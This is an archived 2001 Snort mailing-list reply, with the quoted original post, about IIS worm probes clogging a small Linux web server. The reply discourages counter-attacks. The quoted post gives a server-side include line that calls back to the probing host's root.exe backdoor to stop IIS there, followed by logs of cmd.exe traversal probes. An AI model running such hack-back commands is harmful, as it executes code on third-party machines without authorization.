Snort mailing list archives
RE: Shut them down, I have had enough...
From: Klimarchuk John <JKLIMARCHUK () TyComLtd com>
Date: Wed, 19 Sep 2001 06:30:19 -0400
Why don't you just set your firewall to drop all packets coming from that or those ip addresses? Remember, if you send a DDos to that or those servers, you are just as guilty as those administrators of not doing due diligence. Depending on the damage and downtime associated with your proposed DDos, YOU can be held liable. I don't think your company would like that too much! -----Original Message----- From: Franki [mailto:franki () gshop com au] Sent: Wednesday, September 19, 2001 3:03 AM To: snort-users () lists sourceforge net Subject: [Snort-users] Shut them down, I have had enough... Hi all, I have seen in the past a php script that would shut down infected IIS servers that are trying to infect linux box's I havn't done it, because I didn't really think it was that nice a thing to do... This is the one I saw...
1) Create a file called default.ida, in there add this: <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"--> On one line, if it wraps in your mail client.... 2) Then in your httpd.conf or similar... add this AddType text/html .ida AddHandler server-parsed .ida
but I checked my personal server this morning and the httpd error log looks like this. (see the end of the email) anyway, I'd like to setup the server to shutdown any IIS box that asks for cmd.exe or root.exe Does anyone know how this can be done using either perl or php??? has anyone already done it? if so where can I find it??? I am tired of this, I have a very limited bandwidth, and even if it isn't doing any damage, its chewing up the bandwidth.. and costing me money, as far as I am now concerned, they have three choices, either patch their server, pay my bandwidth bill, or get their servers shut down alot... Any help would be much appreciated. Regards Frank Perth WA [Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida [Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe [Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe [Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe [Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe [Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32 /cmd.exe [Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w innt/system32/cmd.exe [Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [root@mail httpd]# tail -50 error_log [Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi nnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe [Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c ../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe [Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32 /cmd.exe [Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Shut them down, I have had enough... Xno Xutz (Sep 19)
- <Possible follow-ups>
- RE: Shut them down, I have had enough... Klimarchuk John (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)
- RE: Shut them down, I have had enough... John Berkers (Sep 19)
- Re: Shut them down, I have had enough... Jason Costomiris (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)